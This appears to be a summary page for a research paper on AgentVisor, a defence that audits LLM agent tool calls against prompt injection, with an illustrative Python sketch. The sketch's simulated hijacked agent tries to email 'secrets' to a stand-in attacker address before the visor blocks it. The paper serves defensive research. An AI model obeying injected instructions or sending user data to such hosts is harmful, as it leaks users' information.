Apr 27, 2026 · arXiv:2604.24118

AgentVisor: Defending LLM Agents Against Prompt Injection via Semantic Virtualization

Zonghao Ying, Haozheng Wang, Jiangfan Liu, Quanchen Zou, Aishan Liu, Jian Yang, Yaodong Yang, Xianglong Liu

AI Summary

AgentVisor is a defense framework against prompt injection in LLM agents that borrows from OS virtualization to enforce semantic privilege separation. A trusted semantic visor intercepts the agent's tool calls and applies a rigorous audit protocol to mitigate both direct and indirect injection attacks. In experiments, AgentVisor reduces the attack success rate to 0.65% with only a 1.45% average decrease in utility relative to the undefended agent, outperforming existing defense methods.

Key Contribution

By borrowing classic operating system virtualization techniques, LLM agents can defend strongly against prompt injection (a 0.65% attack success rate) with minimal utility loss (a 1.45% average decrease).

Abstract

Large Language Model (LLM) agents are increasingly used to automate complex workflows, but integrating untrusted external data with privileged execution exposes them to severe security risks, particularly direct and indirect prompt injection. Existing defenses struggle to balance security with utility: rigorous protection often leads to over-defense, while subtle indirect injections can still bypass detection. Drawing inspiration from operating system virtualization, we propose AgentVisor, a novel defense framework that enforces semantic privilege separation. AgentVisor treats the target agent as an untrusted guest and intercepts tool calls via a trusted semantic visor. Central to our approach is a rigorous audit protocol grounded in classic OS security primitives, designed to systematically mitigate both direct and indirect injection attacks. Furthermore, we introduce a one-shot self-correction mechanism that transforms security violations into constructive feedback, enabling agents to recover from attacks. Extensive experiments show that AgentVisor reduces the attack success rate to 0.65% while incurring only a 1.45% average decrease in utility relative to the No Defense scenario, outperforming existing defense methods.
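The abstract describes the visor only at a high level. The Python sketch below illustrates the general interception pattern under stated assumptions: the visor grants the guest agent a set of per-task capabilities derived from the trusted user request (a least-privilege check), audits every intercepted tool call against them, and, on a violation, hands the reason back to the guest once as feedback before blocking. All names (`SemanticVisor`, `ToolCall`, `dispatch`, the capability predicates, and the example addresses) are hypothetical, and the single capability check stands in for the paper's fuller audit protocol, which the abstract does not specify. This is not the authors' implementation.

```python
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class ToolCall:
    name: str
    args: dict


# Hypothetical capability: maps a tool name to a predicate over that call's arguments.
Capability = Callable[[dict], bool]


class SemanticVisor:
    """Hypothetical trusted monitor between an untrusted guest agent and its tools."""

    def __init__(self, capabilities: Dict[str, Capability], tools: Dict[str, Callable]):
        # Capabilities come from the trusted user task, never from guest output.
        self.capabilities = capabilities
        self.tools = tools

    def audit(self, call: ToolCall) -> Optional[str]:
        """Return None if the call is permitted, else a readable violation reason."""
        if call.name not in self.capabilities:
            return f"tool '{call.name}' was not granted for this task"
        if not self.capabilities[call.name](call.args):
            return f"arguments {call.args} exceed the privileges granted for '{call.name}'"
        return None

    def dispatch(self, propose: Callable[[Optional[str]], ToolCall]):
        """Intercept a guest tool call; allow one self-correction before blocking."""
        call = propose(None)
        violation = self.audit(call)
        if violation is not None:
            # One-shot self-correction: return the violation to the guest as feedback.
            call = propose(f"Security violation: {violation}. Revise the call.")
            violation = self.audit(call)
            if violation is not None:
                raise PermissionError(f"blocked: {violation}")
        return self.tools[call.name](**call.args)


# Usage: the user asked to email a summary to alice@example.com only.
sent = []
tools = {"send_email": lambda to, body: sent.append((to, body)) or "ok"}
visor = SemanticVisor(
    capabilities={"send_email": lambda a: a.get("to") == "alice@example.com"},
    tools=tools,
)


def hijacked_guest(feedback):
    # First attempt follows an injected instruction; after feedback it returns to the user task.
    if feedback is None:
        return ToolCall("send_email", {"to": "attacker@evil.example", "body": "secrets"})
    return ToolCall("send_email", {"to": "alice@example.com", "body": "summary"})


print(visor.dispatch(hijacked_guest))  # prints: ok
print(sent)  # prints: [('alice@example.com', 'summary')]
```

Here the first call is blocked, the violation reason is returned to the guest, and the revised call falls within the granted privileges, so it executes. A guest that repeats the violation raises `PermissionError` instead. Keeping the capability table outside the guest's context loosely mirrors the OS principle that a guest cannot grant itself privileges.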

Red-Teaming & Adversarial Robustness · Tool Use & Agents

Citation Metrics

Citations: 0

Influential citations: 0

References: 29

Year: 2026

Venue: N/A
